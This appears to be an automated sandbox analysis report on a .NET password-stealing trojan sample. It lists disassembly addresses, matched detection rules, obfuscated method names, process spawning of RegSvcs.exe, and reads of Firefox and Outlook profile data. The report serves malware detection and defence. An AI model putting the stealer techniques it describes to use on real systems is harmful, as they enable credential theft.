Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5C27B	0_2_07B5C27B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B52117	0_2_07B52117
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B52150	0_2_07B52150
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B52141	0_2_07B52141
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5AA78	0_2_07B5AA78
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5089F	0_2_07B5089F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B53810	0_2_07B53810
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B53800	0_2_07B53800
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07C40448	0_2_07C40448
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00E5E768	2_2_00E5E768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00E54AC8	2_2_00E54AC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00E53EB0	2_2_00E53EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00E541F8	2_2_00E541F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067066D8	2_2_067066D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067033D0	2_2_067033D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0670B3C0	2_2_0670B3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06700A0A	2_2_06700A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0670E868	2_2_0670E868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06708810	2_2_06708810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_06708F13	2_2_06708F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0670ACE0	2_2_0670ACE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_067059E0	2_2_067059E0

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000000.1666331530.0000000000E72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameEQm.exe" vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename04270d52-09be-426d-981e-ac7270cab5c5.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1690478704.000000000A300000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1685590184.00000000034C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename04270d52-09be-426d-981e-ac7270cab5c5.exe4 vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1684363655.000000000143E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Binary or memory string: OriginalFilenameEQm.exe" vs SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, cPs8D.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 72CF8egH.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, G5CXsdn.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 3uPsILA6U.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 6oQOw74dfIt.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, aMIWm.cs	Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, 3QjbQ514BDx.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, iaBx0C70ImTHXMC3jW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, iaBx0C70ImTHXMC3jW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, iaBx0C70ImTHXMC3jW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, iaBx0C70ImTHXMC3jW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: _0020.SetAccessControl
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	Security API names: _0020.AddAccessRule
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, iaBx0C70ImTHXMC3jW.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, iaBx0C70ImTHXMC3jW.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.34964c0.0.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.3485e60.1.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5d90000.7.raw.unpack, ReactionVessel.cs	Suspicious method names: .ReactionVessel.Inject

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@3/3

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.log

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.79%

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Virustotal: Detection: 25%

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Section loaded: windowscodecs.dll	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles

Jump to behavior

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, V4uC3Iifq56IKQcfry.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, SpreadsheetName.cs	.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	.Net Code: OygV6LvT2m System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	.Net Code: OygV6LvT2m System.Reflection.Assembly.Load(byte[])
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.a300000.8.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	.Net Code: OygV6LvT2m System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_05708E78 push eax; mov dword ptr [esp], ecx	0_2_05708E7C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B596D1 push es; retn 0007h	0_2_07B596D2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B59569 push es; retn 0007h	0_2_07B5956A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07C41BA3 push esp; retn 0007h	0_2_07C41BA9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_00E50C3D push edi; ret	2_2_00E50CC2

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: section name: .text entropy: 7.9668276845634205

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, FQ5vVIWSB17NILlySd.cs	High entropy of concatenated method names: 'VTv6cVXAp', 'Hh1EG1MGX', 'c9PSA2Yfs', 'iZ9IqfOtb', 'If6X95jXC', 'Kt0huvhDZ', 'hGMIyPVMysOchB8dEM', 'Ef6qHIcdVw7Ri7Brsq', 'HZvBOAxgt', 'AioOMfSnj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, lQt3bjCFjySeu10Avr9.cs	High entropy of concatenated method names: 's3N0keKA98', 'cuK0YUkJss', 'Idi06Mx6a8', 'X8s0EUWpn6', 'kaq0UX6ruE', 'Xvb0SDbF4H', 'Kao0IMATGl', 'GgL07isXH7', 'ijF0XZq04X', 'VOc0hbFtUj'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, NOtAo8hDHbV4S980Ea.cs	High entropy of concatenated method names: 'Te5LUf4x1l', 'OpNLIWeVIZ', 'ygF1uQb51L', 'kmO1KC67Yn', 'nI31QOn9Sa', 'r5t12abvYy', 'uv11NuKZDM', 'h601JoAKQ6', 'kJ11ytjYUY', 'eFe1HOqUbP'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, stOlycCWAUXDXt7labi.cs	High entropy of concatenated method names: 'CaFOk07u8V', 'CPROYjspV6', 'f1NO6b5G1I', 'dI4CeTiPvK1pNjrRUot', 'gG5yDkivGVhB2irduij', 'togE97i2npmnDSsmDJX', 'Pl9CQyi8YCVb6LyMjL6'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, x69TvMCoRoUJFd88L0w.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wDcOrJ4PPT', 'cY1Oph0sjt', 'KWUOMChdIl', 'VDtOD6EPgY', 'vifOlooW9P', 'l94ORq6Qhr', 'MNUOcONccG'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, UwQUc8iFGUbE1e0lM9.cs	High entropy of concatenated method names: 'EUuBbqXN2D', 'sfkB832ilw', 'iOoBukinsO', 'aRoBKM3Jfp', 'RWSBrZepnq', 'vMfBQknv44', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, N8PhylRceh4eZBQMYU.cs	High entropy of concatenated method names: 'F905saU2g1', 'DOT5x8DqBp', 'jiyBFmMI5C', 'UxbBC7MW3V', 'u8A5fEFYNT', 'sgF5adnFAE', 'Gfr5eJhqs0', 'SPL5rFnAUZ', 'BVG5pXjZOs', 'Jru5MWkM6r'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, vR30oQGrkAFCk2reXc.cs	High entropy of concatenated method names: 'Dispose', 'w0fCi22h7D', 'F7LW8YvoQh', 'jRixxlrvXR', 'JttCxt68qA', 'yPNCz4nrK3', 'ProcessDialogKey', 'qjlWFwQUc8', 'aGUWCbE1e0', 'UM9WWJKcnQ'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, jjac4rygKOuVBAQDuX.cs	High entropy of concatenated method names: 'EBQvkS8m2d', 'SbFvY9akaQ', 'gJUv6eYmpY', 'Am7vEJWCHK', 'AYJvUwUohj', 'rLHvSFlWyL', 'Pr3vIIY5yU', 'pmpv7r7Sfr', 'HJdvXNo4mT', 'zRGvhshiVk'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, fNgDLlVwKp7yITm1GO.cs	High entropy of concatenated method names: 'hyLCvaBx0C', 'rImC9THXMC', 'BGdCP8ycFK', 'rePCAsyOtA', 'k80CwEau8Y', 'RhKCtl5IMq', 'CN7vSE2lvo2ZMgbxtr', 'QQJx2c8y3NA1UtAXuM', 'JuYCCAYOdm', 'JoNComTPbd'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, KwnJ9o9hiIrcHUfDCG.cs	High entropy of concatenated method names: 'g0eogQUiDZ', 'dXnoqaOgiA', 'iyPoG6Y7FE', 'mLgo1x8sRa', 'CfPoLevAep', 'LfQomfIxtM', 'WUxovioAJ8', 'udbo9jFTrj', 'q43oZ1OTDs', 'WaNoPasiC2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, MKcnQUxfK4ESKWpHAj.cs	High entropy of concatenated method names: 'YwV0CknXR0', 'iPg0oXxOi6', 'C710VDRxSj', 'BFO0q6cQqI', 'Hox0GecS43', 'oYX0LDhaLA', 'pVh0me5n4l', 'MDABcKR1tk', 'UPLBsvXKxv', 'vBpBiXb2eq'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, H8YrhKbl5IMqi5bCCw.cs	High entropy of concatenated method names: 'Mm3mgJFrZW', 'q4amG4TKVx', 'ILOmLotj3G', 'rc2mvxTOMj', 'qPLm9eiUQV', 'NmvLlsnDyi', 'xMOLRvJscs', 'zGLLccbo4v', 'KcELsqZfug', 'vLsLiKI6Z6'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, YHmp2TMpnj0Ol4bYvB.cs	High entropy of concatenated method names: 'ToString', 'j6ctfTWgF2', 'PW7t8xEVnp', 'HtutuIC2OC', 'sbXtKPbain', 'MCQtQAgkoR', 'm6pt2NPd9s', 'F4OtNO7YXV', 'w4YtJq9qlp', 'HINty1qRnM'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, RVotStDoL1dYM3wrYJ.cs	High entropy of concatenated method names: 'Ld95Pkf7NB', 'AdS5Aa00mN', 'ToString', 'Rnf5qegSUL', 'sOf5GknjsO', 'R9m51ZAqFb', 'Ex65LjZOFB', 'YZQ5mMgHkm', 'poa5vmE7Xl', 'omi59OfWkT'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, ptt68qsAYPN4nrK35j.cs	High entropy of concatenated method names: 'cdCBqs73CA', 'XAlBG4ZmZj', 'wPxB1eLPGh', 'fxgBLc5DTy', 'MiQBmpHAZR', 'o91Bv4BH6K', 'gEQB9MmOhi', 'A0RBZCcZOd', 'T8qBPi566T', 'lsrBAhZWqb'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, XFYg8MeV9E8pqPhPOM.cs	High entropy of concatenated method names: 'gPIT7me1Jk', 'm8UTXYDjDU', 'A7HTbLi1sY', 'YuCT85furc', 'QbjTKCgX7U', 'gRkTQ0ucu3', 'g4oTNDc8wA', 'JlXTJEDkGQ', 'nIqTHWVdK9', 'gO3TfvjW6R'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, YuYPHUXGd8ycFKBePs.cs	High entropy of concatenated method names: 'vx41ErlVXM', 'Xmn1S4Xahu', 'ctP17HIy8v', 'pQY1XiwN9F', 'aKu1wp6ViF', 'na61t8oN2x', 'muI15VcmD0', 'dAZ1Bcs0og', 'Oj810R67Pd', 'YVu1OD1DU8'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, evO3OhNqvdpcTnHPi9.cs	High entropy of concatenated method names: 'AWJvqtPNoi', 'Hvvv1VFIRK', 'mGKvmeXgej', 'lHWmx6kuJa', 'Pw1mz0Blw6', 'jt3vFtBVFI', 'YWFvCZeRdn', 'sbSvWPnTDn', 'LVMvohoPjw', 'kkcvVpAGgX'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, cWqDldrDf5gHB0qqkS.cs	High entropy of concatenated method names: 'MATwHGEqLR', 'vuSwabWukp', 'z0GwrAhZOt', 'Gw6wp9HZO6', 'B0Gw8rZvOO', 'YAfwu27V9e', 'KLUwKekmEd', 'ATWwQiPC7D', 'NCyw2xR54p', 'XUtwNZbGT2'
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, iaBx0C70ImTHXMC3jW.cs	High entropy of concatenated method names: 'mhYGrLoUHI', 'nJ4GprFoOW', 'G3bGMgGEwA', 'EIiGD0G5rZ', 'JqVGlZtR3N', 'U9PGR1Ql1r', 'eekGciIDak', 'JI7GsplTkK', 'DpNGirg7Wo', 'YuYGxu1kPh'
